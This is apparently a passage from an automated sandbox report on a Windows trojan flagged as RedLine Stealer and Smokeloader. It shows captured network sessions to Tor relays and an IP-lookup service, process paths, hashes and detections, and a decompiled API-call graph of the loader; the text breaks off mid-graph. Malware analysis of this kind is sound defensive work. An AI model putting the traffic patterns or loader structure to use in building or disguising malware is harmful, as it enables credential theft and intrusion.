6f 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 37 68 56 4d 74 72 68 4d 36 6d 68 51 46 35 30 49 4b 49 50 57 62 36 67 45 30 70 39 64 71 35 4d 50 71 52 64 67 4c 2f 36 78 6e 72 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 32 35 3a 31 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 46 42 30 20 37 36 39 30 20 44 36 34 43 20 45 35 43 32 20 32 42 35 31 20 37 35 31 38 20 33 43 30 45 20 35 39 36 37 20 38 43 44 46 20 37 45 41 42 0a 75 70 74 69 6d 65 20 31 39 34 34 36 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 35 32 30 20 31 30 37 33 37 34 31 38 32 34 20 36 34 32 34 35 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 31 43 36 39 42 46 33 30 42 30 45 34 43 35 44 30 34 41 31 44 30 41 46 44 33 31 46 37 30 31 39 30 32 37 33 37 44 38 32 20 32 75 78 43 66 70 53 55 4a 50 4c 62 59 67 63 43 31 79 63 48 4e 30 36 52 67 63 33 67 36 30 55 42 78 7a 56 4a 6c 69 55 37 4d 51 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 50 76 61 6f 56 75 54 4a 43 42 79 4a 79 66 39 2b 43 6a 4e 72 6e 46 55 78 4c 4f 6a 54 57 6d 62 52 77 31 70 67 31 30 78 55 65 35 50 70 4a 58 76 4f 2b 55 61 74 44 74 55 0a 32 68 54 4c 59 6c 59 58 49 76 50 69 58 6c 73 4e 35 38 54 59 58 30 55 68 6c 6c 72 51 66 32 34 48 52 65 68 41 45 41 6b 39 6c 67 57 69 38 72 64 49 55 30 36 74 39 7a 53 72 33 2b 42 5a 59 56 61 30 0a 34 4b 33 39 2b 69 41 71 36 66 44 7a 73 45 52 53 5a 33 54 37 37 36 52 59 48 34 50 46 31 4e 6f 77 4e 56 4e 55 30 50 33 73 59 70 37 7a 79 4e 74 79 59 39 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f
                      Data Ascii: router INSRelay35at8443 140.78.100.35 8443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvaAbxr8j6uK5CvIaJKKtLO7ZoFHYvGcnhowcIB0rcTRbBgAQAgBADuFUy2uEzqaFAXnQgog9ZvqATSn12rkw+pF2Av/rGeuYGAxyzatpJYhMfQ/3tLj71Wq1lrIjQmnfPLrL3iwCD+MKpsV/4Ckr197X350AgOawxfw+pnpdu1FUz/Esn/bwo=-----END ED25519 CERT-----master-key-ed25519 7hVMtrhM6mhQF50IKIPWb6gE0p9dq5MPqRdgL/6xnrkplatform Tor 0.4.8.0-alpha-dev on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:25:17fingerprint 0FB0 7690 D64C E5C2 2B51 7518 3C0E 5967 8CDF 7EABuptime 194463bandwidth 107520 1073741824 6424576extra-info-digest F1C69BF30B0E4C5D04A1D0AFD31F701902737D82 2uxCfpSUJPLbYgcC1ycHN06Rgc3g60UBxzVJliU7MQMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAPvaoVuTJCByJyf9+CjNrnFUxLOjTWmbRw1pg10xUe5PpJXvO+UatDtU2hTLYlYXIvPiXlsN58TYX0UhllrQf24HRehAEAk9lgWi8rdIU06t9zSr3+BZYVa04K39+iAq6fDzsERSZ3T776RYH4PF1NowNVNU0P3sYp7zyNtyY9oxAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAo


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.549711116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:33.058582067 CET2661OUTGET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:33.081352949 CET2663INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:33 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:33 GMT
                      Data Raw: 72 6f 75 74 65 72 20 53 65 70 69 69 64 61 65 20 31 37 32 2e 30 2e 34 37 2e 37 38 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 74 6c 41 52 57 35 2f 76 36 52 4a 78 32 4d 4d 52 74 30 74 50 32 64 63 62 68 77 4a 65 5a 6e 42 69 36 61 2f 70 73 33 6e 35 57 4a 5a 53 32 31 41 51 41 67 42 41 42 39 41 59 61 36 0a 65 47 7a 39 68 4d 53 57 66 64 73 68 41 58 62 4f 2f 6e 59 37 7a 72 63 34 7a 4c 77 45 52 4c 67 4b 46 77 75 4a 79 54 4a 59 6a 67 4d 4c 66 76 33 41 61 64 4e 38 6d 77 4b 79 4c 52 47 5a 34 73 71 45 0a 57 6a 74 2b 5a 33 6d 2b 50 35 32 48 54 2b 55 64 4d 68 50 4c 43 43 52 64 58 71 4e 74 61 6e 62 2b 34 5a 4e 34 35 4d 6f 62 49 4c 72 38 4f 44 34 58 42 77 70 66 35 47 32 46 51 67 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 66 51 47 47 75 6e 68 73 2f 59 54 45 6c 6e 33 62 49 51 46 32 7a 76 35 32 4f 38 36 33 4f 4d 79 38 42 45 53 34 43 68 63 4c 69 63 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 30 39 3a 35 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 45 46 46 20 32 37 30 34 20 44 31 39 42 20 46 34 35 33 20 30 35 42 42 20 43 43 41 35 20 33 45 32 42 20 35 39 41 33 20 44 31 37 41 20 36 45 45 33 0a 75 70 74 69 6d 65 20 38 34 32 35 35 34 0a 62 61 6e 64 77 69 64 74 68 20 31 38 38 37 34 33 36 20 32 33 30 36 38 36 37 20 31 38 38 31 30 30 38 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 35 33 30 36 34 42 45 39 31 38 46 42 41 31 34 37 36 36 43 35 43 41 35 33 35 33 37 35 30 34 30 38 44 30 44 31 35 39 34 35 20 55 70 51 66 31 66 50 6a 61 45 6d 43 75 78 42 58 31 7a 78 46 73 58 45 66 37 32 70 7a 78 76 6c 6f 54 73 4e 5a 57 48 44 45 63 59 55 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 38 44 44 37 48 65 63 66 68 69 46 31 66 7a 4a 33 65 34 6c 36 33 4b 38 61 6d 73 43 52 5a 4f 76 55 66 77 75 54 4b 4a 79 4d 4d 37 30 54 45 43 4a 61 75 39 59 37 43 76 0a 4c 6a 75 51 6a 58 79 37 6a 4a 2b 4b 4c 54 75 52 44 62 56 31 63 67 73 57 6b 55 6e 47 50 47 69 55 57 48 52 79 46 35 31 71 42 72 69 4a 61 68 66 62 6f 72 5a 53 6e 62 35 46 37 31 32 62 4d 79 30 72 0a 42 63 4b 4b 2b 62 64 67 64 61 6d 69 4f 65 46 73 35 54 6e 73 6f 51 5a 35 6b 65 44 62 65 72 7a 63 6c 61 37 5a 52 50 65 48 68 47 2f 63 63 39 7a 56 45 63 53 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 48 4d 72 51 64 4f 64 43 56 6a 4a 68 66 77 66 64 75
                      Data Ascii: router Sepiidae 172.0.47.78 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxtlARW5/v6RJx2MMRt0tP2dcbhwJeZnBi6a/ps3n5WJZS21AQAgBAB9AYa6eGz9hMSWfdshAXbO/nY7zrc4zLwERLgKFwuJyTJYjgMLfv3AadN8mwKyLRGZ4sqEWjt+Z3m+P52HT+UdMhPLCCRdXqNtanb+4ZN45MobILr8OD4XBwpf5G2FQgE=-----END ED25519 CERT-----master-key-ed25519 fQGGunhs/YTEln3bIQF2zv52O863OMy8BES4ChcLickplatform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:09:53fingerprint 1EFF 2704 D19B F453 05BB CCA5 3E2B 59A3 D17A 6EE3uptime 842554bandwidth 1887436 2306867 1881008extra-info-digest 53064BE918FBA14766C5CA5353750408D0D15945 UpQf1fPjaEmCuxBX1zxFsXEf72pzxvloTsNZWHDEcYUonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL8DD7HecfhiF1fzJ3e4l63K8amsCRZOvUfwuTKJyMM70TECJau9Y7CvLjuQjXy7jJ+KLTuRDbV1cgsWkUnGPGiUWHRyF51qBriJahfborZSnb5F712bMy0rBcKK+bdgdamiOeFs5TnsoQZ5keDberzcla7ZRPeHhG/cc9zVEcSNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMHMrQdOdCVjJhfwfdu


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.54969964.185.227.155443C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      2023-02-08 23:59:57 UTC0OUTGET / HTTP/1.0
                      Host: api.ipify.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      2023-02-08 23:59:57 UTC0INHTTP/1.0 200 OK
                      Content-Length: 11
                      Content-Type: text/plain
                      Date: Wed, 08 Feb 2023 23:59:57 GMT
                      Vary: Origin
                      2023-02-08 23:59:57 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                      Data Ascii: 84.17.52.13


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.549737173.231.16.76443C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      2023-02-09 00:01:54 UTC0OUTGET / HTTP/1.0
                      Host: api.ipify.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      2023-02-09 00:01:54 UTC0INHTTP/1.0 200 OK
                      Content-Length: 11
                      Content-Type: text/plain
                      Date: Thu, 09 Feb 2023 00:01:54 GMT
                      Vary: Origin
                      2023-02-09 00:01:54 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                      Data Ascii: 84.17.52.13


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:00:59:48
                      Start date:09/02/2023
                      Path:C:\Users\user\Desktop\i1lq1Qpbyw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\i1lq1Qpbyw.exe
                      Imagebase:0x400000
                      File size:117248 bytes
                      MD5 hash:40753D4F4BA5863BE3AAAA38CD50995A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:1
                      Start time:00:59:52
                      Start date:09/02/2023
                      Path:C:\ProgramData\dtkttiw\llfujo.exe
                      Wow64 process (32bit):true
                      Commandline:C:\ProgramData\dtkttiw\llfujo.exe start
                      Imagebase:0x400000
                      File size:117248 bytes
                      MD5 hash:40753D4F4BA5863BE3AAAA38CD50995A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.570272612.000000000091C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:6.7%
                        Dynamic/Decrypted Code Coverage:82.2%
                        Signature Coverage:34.8%
                        Total number of Nodes:1058
                        Total number of Limit Nodes:6
                        execution_graph 5830 401000 5855 406259 5830->5855 5832 401019 CreateThread GetModuleFileNameA 5856 405d68 GetCurrentProcess OpenProcessToken 5832->5856 6281 405b8b 5832->6281 5834 401093 5864 405e22 5834->5864 5835 401048 5835->5834 5838 401066 ShellExecuteA 5835->5838 5837 40109d 5839 4010a7 GetPEB 5837->5839 5840 4010bc 5837->5840 5838->5835 5839->5840 5840->5840 5841 4010e4 OpenMutexA CreateMutexA 5840->5841 5842 401112 5841->5842 5843 401124 EnumWindows Sleep 5841->5843 5845 40111f 5842->5845 5846 4011a9 Sleep 5842->5846 5844 401146 5843->5844 5843->5845 6285 40593c 5843->6285 5869 4057a9 5844->5869 5904 4046ae 5845->5904 5849 40688b ExitProcess 5846->5849 5851 401154 GetModuleFileNameA 5884 4058cb GetEnvironmentVariableA 5851->5884 5853 401178 CopyFileA 5888 4053b9 5853->5888 5855->5832 5857 405e1a 5856->5857 5858 405d9a LocalAlloc GetTokenInformation 5856->5858 5857->5835 5859 405dc1 LocalFree LocalAlloc GetTokenInformation 5858->5859 5860 405dea 5858->5860 5859->5860 5861 405e0a LocalFree CloseHandle 5860->5861 5862 405dee GetSidSubAuthority 5860->5862 5861->5857 5862->5861 5863 405dfe 5862->5863 5863->5861 5911 406259 5864->5911 5866 405e3e GetCommandLineW 5867 405e47 CommandLineToArgvW 5866->5867 5868 405e5b 5866->5868 5867->5868 5868->5837 5870 4057c5 5869->5870 5871 4057d6 CreateToolhelp32Snapshot 5870->5871 5872 4057eb 5871->5872 5873 401150 5871->5873 5912 406698 5872->5912 5873->5846 5873->5851 5875 40581a 5916 406788 5875->5916 5878 4058b6 CloseHandle 5878->5873 5879 40582c 5879->5878 5880 405881 5879->5880 5881 406698 GetPEB 5879->5881 5882 406788 GetPEB 5879->5882 5880->5878 5881->5879 5883 4058ac Process32Next 5882->5883 5883->5879 5885 4058f3 5884->5885 5886 405904 CreateDirectoryA 5885->5886 5887 40591c 5886->5887 5887->5853 5889 4053d4 5888->5889 5922 405708 5889->5922 5891 4053eb CoInitialize 5892 405405 5891->5892 5893 405418 CoCreateInstance 5892->5893 5894 4056fc CoUninitialize 5893->5894 5895 40543c 5893->5895 5894->5846 5896 405d68 10 API calls 5895->5896 5903 4055d1 5895->5903 5897 4054b5 5896->5897 5898 4054c6 GetUserNameExW 5897->5898 5899 4054c3 5897->5899 5898->5899 5900 40557b GetLocalTime SystemTimeToFileTime 5899->5900 5899->5903 5901 4055a5 5900->5901 5902 4055aa FileTimeToSystemTime 5900->5902 5901->5902 5902->5903 5903->5894 5930 406259 5904->5930 5906 4046c7 Sleep WSAStartup 5906->5906 5907 4046e6 5906->5907 5908 40473a InitSecurityInterfaceA 5907->5908 5910 4047a4 Sleep 5907->5910 5931 404be5 5907->5931 5908->5907 5910->5907 5911->5866 5913 4066b4 5912->5913 5914 4066c5 GetPEB 5913->5914 5915 4066da 5914->5915 5915->5875 5918 4067a4 5916->5918 5917 405825 Process32First 5917->5879 5918->5917 5919 406698 GetPEB 5918->5919 5920 406873 5919->5920 5921 406788 GetPEB 5920->5921 5921->5917 5929 406259 5922->5929 5924 405724 CoInitialize 5925 40573e 5924->5925 5926 405751 CoCreateInstance 5925->5926 5927 40579d CoUninitialize 5926->5927 5928 405771 5926->5928 5927->5891 5928->5927 5929->5924 5930->5906 5988 406259 5931->5988 5933 404c01 CreateEventA 5934 404c38 VirtualAlloc 5933->5934 5935 404c1a VirtualAlloc 5933->5935 5937 404ef0 5934->5937 5938 404c53 GetUserNameExA 5934->5938 5936 404c35 5935->5936 5935->5937 5936->5934 6119 40609e 5937->6119 5940 404d23 5938->5940 5960 404c75 5938->5960 6072 4027bb 5940->6072 5944 404d19 5944->5937 5945 404d3f WSAIoctl 5944->5945 5947 404dad 5945->5947 6088 405ce3 5947->6088 5948 405338 6129 405ffb 5948->6129 5949 404ce3 5989 404681 5949->5989 5950 406698 GetPEB 5954 40532d 5950->5954 5958 406788 GetPEB 5954->5958 5955 404cef 5992 4011b8 5955->5992 5958->5948 5960->5949 5965 404ccb inet_addr 5960->5965 5964 404681 VirtualFree 5966 405389 5964->5966 5965->5949 5967 404681 VirtualFree 5966->5967 5968 405392 5967->5968 5970 4053ac 5968->5970 5972 405708 3 API calls 5968->5972 5969 404deb 6099 405f08 5969->6099 5970->5907 5973 4053a5 ExitProcess 5972->5973 5974 404e57 select 5974->5937 5986 404e29 5974->5986 5975 405fa7 17 API calls 5975->5986 5976 405f08 11 API calls 5976->5986 5977 405118 VirtualAlloc 5977->5937 5977->5986 5979 404681 VirtualFree 5979->5986 5980 405f08 11 API calls 5981 40506d GetTempPathA 5980->5981 5981->5986 5982 4051d5 socket 5984 4051e0 setsockopt CreateThread 5982->5984 5983 4051c8 socket 5983->5984 5984->5986 5986->5937 5986->5974 5986->5975 5986->5976 5986->5977 5986->5979 5986->5980 5986->5982 5986->5983 5987 4053b9 20 API calls 5986->5987 6105 40662b 5986->6105 6111 405e81 5986->6111 5987->5986 5988->5933 5990 4046a7 5989->5990 5991 40468f VirtualFree 5989->5991 5990->5955 5991->5990 6137 406259 5992->6137 5994 4011d4 CryptAcquireContextA 5995 406698 GetPEB 5994->5995 5996 401204 5995->5996 5997 406788 GetPEB 5996->5997 5998 40120f 5997->5998 5999 406698 GetPEB 5998->5999 6000 40122a 5999->6000 6001 406788 GetPEB 6000->6001 6002 401235 6001->6002 6003 406698 GetPEB 6002->6003 6004 401250 6003->6004 6005 406788 GetPEB 6004->6005 6006 40125b 6005->6006 6007 406698 GetPEB 6006->6007 6008 40127c 6007->6008 6009 406788 GetPEB 6008->6009 6025 401287 6009->6025 6010 40609e GetPEB 6011 4026cf 6010->6011 6013 40605d GetPEB 6011->6013 6014 402706 CryptReleaseContext 6013->6014 6015 402733 6014->6015 6016 402719 6014->6016 6017 406698 GetPEB 6015->6017 6018 406698 GetPEB 6016->6018 6019 402744 6017->6019 6020 402728 6018->6020 6021 406788 GetPEB 6019->6021 6022 406788 GetPEB 6020->6022 6023 40274f 6021->6023 6022->6015 6024 406698 GetPEB 6023->6024 6026 402760 6024->6026 6057 401d55 6025->6057 6069 40143e 6025->6069 6138 402a45 6025->6138 6027 406788 GetPEB 6026->6027 6028 40276b 6027->6028 6029 404681 VirtualFree 6028->6029 6030 40278a 6029->6030 6031 404681 VirtualFree 6030->6031 6032 402796 6031->6032 6033 404681 VirtualFree 6032->6033 6034 4027a2 6033->6034 6035 404681 VirtualFree 6034->6035 6036 4027ae 6035->6036 6036->5944 6037 4031be 39 API calls 6037->6069 6038 401541 CryptStringToBinaryA 6155 404656 6038->6155 6041 405ffb 4 API calls 6041->6069 6042 4030ca GetPEB 6042->6069 6043 401574 CryptStringToBinaryA 6043->6069 6044 404656 VirtualAlloc VirtualFree 6044->6069 6045 404224 8 API calls 6045->6069 6046 40253e select 6046->6069 6047 4016fa inet_addr 6047->6069 6048 401ec3 CryptStringToBinaryA CryptStringToBinaryA 6048->6069 6049 40171d CryptStringToBinaryA CryptStringToBinaryA 6158 403de9 6049->6158 6051 403515 8 API calls 6051->6069 6052 40263f inet_addr 6221 404224 6052->6221 6053 404554 7 API calls 6053->6069 6056 401854 CryptStringToBinaryA CryptStringToBinaryA 6056->6069 6057->6010 6058 4018a8 CryptDecodeObject 6058->6069 6059 4020eb wsprintfA 6194 403616 6059->6194 6061 4021b1 select 6061->6069 6062 404359 6 API calls 6062->6069 6063 406698 GetPEB 6063->6069 6064 406788 GetPEB 6064->6069 6065 404681 VirtualFree 6065->6069 6067 40605d GetPEB 6067->6069 6068 403616 GetPEB 6068->6069 6069->6037 6069->6038 6069->6041 6069->6042 6069->6043 6069->6044 6069->6045 6069->6046 6069->6047 6069->6048 6069->6049 6069->6051 6069->6052 6069->6053 6069->6056 6069->6057 6069->6058 6069->6059 6069->6061 6069->6062 6069->6063 6069->6064 6069->6065 6069->6067 6069->6068 6070 403697 GetPEB 6069->6070 6166 403bb4 6069->6166 6171 403554 6069->6171 6176 40372e 6069->6176 6203 402d52 6069->6203 6070->6069 6261 406259 6072->6261 6074 4027d7 socket 6262 4061d2 6074->6262 6076 4027f3 setsockopt 6077 402823 6076->6077 6078 402833 6077->6078 6263 4060df 6077->6263 6079 40284f inet_addr 6078->6079 6082 40285d 6079->6082 6083 4028ff 6079->6083 6084 402870 htons ioctlsocket connect 6082->6084 6083->5944 6269 40621f 6084->6269 6087 4028d7 ioctlsocket 6087->6083 6089 405cff 6088->6089 6090 406698 GetPEB 6089->6090 6091 405d1a 6090->6091 6092 406788 GetPEB 6091->6092 6093 404db2 6092->6093 6094 405d36 6093->6094 6095 406698 GetPEB 6094->6095 6096 405d49 6095->6096 6097 406788 GetPEB 6096->6097 6098 404dbb GetVolumeInformationA 6097->6098 6098->5969 6100 405f14 6099->6100 6101 405f27 6099->6101 6103 405e81 4 API calls 6100->6103 6271 403f1e 6101->6271 6104 405f25 6103->6104 6104->5986 6106 406634 CreateFileA 6105->6106 6107 406660 6106->6107 6108 406656 GetLastError 6106->6108 6109 406691 6107->6109 6110 406666 SetFilePointer WriteFile CloseHandle 6107->6110 6108->6106 6108->6107 6109->5986 6110->6109 6112 405e97 WaitForSingleObject 6111->6112 6116 405ea1 6111->6116 6112->6116 6113 405ef0 6114 405ef6 SetEvent 6113->6114 6115 405efe 6113->6115 6114->6115 6115->5986 6116->6113 6117 405eb8 select 6116->6117 6117->6113 6118 405ece send 6117->6118 6118->6113 6118->6116 6122 4060a9 6119->6122 6120 40530b 6124 40605d 6120->6124 6121 406698 GetPEB 6121->6122 6122->6120 6122->6121 6123 406788 GetPEB 6122->6123 6123->6122 6128 406068 6124->6128 6125 405318 6125->5948 6125->5950 6126 406698 GetPEB 6126->6128 6127 406788 GetPEB 6127->6128 6128->6125 6128->6126 6128->6127 6130 406009 6129->6130 6131 40600f DeleteSecurityContext 6129->6131 6130->6131 6133 406015 6130->6133 6131->6133 6132 406023 FreeCredentialsHandle 6134 406029 6132->6134 6133->6132 6133->6134 6135 40534d CloseHandle 6134->6135 6280 40603e shutdown closesocket 6134->6280 6135->5964 6137->5994 6139 402a61 6138->6139 6140 404681 VirtualFree 6139->6140 6141 402a69 6140->6141 6142 4027bb 11 API calls 6141->6142 6143 402a7a 6142->6143 6144 402b81 6143->6144 6145 402a82 wsprintfA 6143->6145 6237 40603e shutdown closesocket 6144->6237 6146 405e81 4 API calls 6145->6146 6150 402aae 6146->6150 6148 402b89 6148->6025 6150->6144 6151 402aee ioctlsocket 6150->6151 6228 405f54 6150->6228 6154 402b0b 6151->6154 6153 405f54 2 API calls 6153->6154 6154->6144 6154->6151 6154->6153 6233 404618 VirtualAlloc 6154->6233 6156 404681 VirtualFree 6155->6156 6157 404664 VirtualAlloc 6156->6157 6157->6069 6159 403e05 6158->6159 6160 402a45 23 API calls 6159->6160 6164 403e42 6160->6164 6161 403f05 6162 404681 VirtualFree 6161->6162 6163 403f11 6162->6163 6163->6069 6164->6161 6165 403ec7 CryptStringToBinaryA CryptStringToBinaryA 6164->6165 6165->6161 6238 406259 6166->6238 6168 403bd0 CryptImportKey CryptExportKey 6239 40618c 6168->6239 6170 403c1a CryptDestroyKey 6170->6069 6172 40356d 6171->6172 6173 40360f 6172->6173 6174 406698 GetPEB 6172->6174 6175 406788 GetPEB 6172->6175 6173->6069 6174->6172 6175->6172 6177 40374a 6176->6177 6178 403bb4 3 API calls 6177->6178 6179 40375c 6178->6179 6181 4037ad 6179->6181 6193 4038cc 6179->6193 6241 4030ca 6179->6241 6182 4030ca GetPEB 6181->6182 6181->6193 6183 4037dd 6182->6183 6184 4030ca GetPEB 6183->6184 6185 4037f9 6184->6185 6186 406698 GetPEB 6185->6186 6187 403859 6186->6187 6188 406788 GetPEB 6187->6188 6189 403864 6188->6189 6190 406698 GetPEB 6189->6190 6191 4038c1 6190->6191 6192 406788 GetPEB 6191->6192 6192->6193 6193->6069 6195 4030ca GetPEB 6194->6195 6196 40363b 6195->6196 6197 403667 6196->6197 6198 403554 GetPEB 6196->6198 6199 403554 GetPEB 6197->6199 6198->6197 6200 40367a 6199->6200 6201 403554 GetPEB 6200->6201 6202 403690 6201->6202 6202->6069 6204 402d6e 6203->6204 6205 402d82 AcquireCredentialsHandleA 6204->6205 6206 4030b3 6205->6206 6207 402db5 6205->6207 6206->6069 6208 4027bb 11 API calls 6207->6208 6209 402dc6 6208->6209 6209->6206 6210 402ddc InitializeSecurityContextA 6209->6210 6210->6206 6211 402e3e 6210->6211 6211->6206 6212 405e81 4 API calls 6211->6212 6213 402e58 FreeContextBuffer VirtualAlloc 6212->6213 6213->6206 6216 402e7b 6213->6216 6214 405f54 2 API calls 6214->6216 6215 404681 VirtualFree 6215->6206 6216->6214 6217 402f46 InitializeSecurityContextA 6216->6217 6218 405e81 4 API calls 6216->6218 6220 403018 6216->6220 6217->6216 6219 403004 FreeContextBuffer 6218->6219 6219->6216 6220->6215 6226 40423d 6221->6226 6222 404242 QueryContextAttributesA VirtualAlloc 6223 404352 6222->6223 6222->6226 6223->6069 6224 4042dc EncryptMessage 6225 405e81 4 API calls 6224->6225 6225->6226 6226->6222 6226->6223 6226->6224 6227 404681 VirtualFree 6226->6227 6227->6226 6229 405f70 6228->6229 6230 405f7b select 6229->6230 6231 405fa0 6230->6231 6232 405f90 recv 6230->6232 6231->6150 6232->6231 6234 404638 6233->6234 6235 404681 VirtualFree 6234->6235 6236 40464b 6235->6236 6236->6154 6237->6148 6238->6168 6240 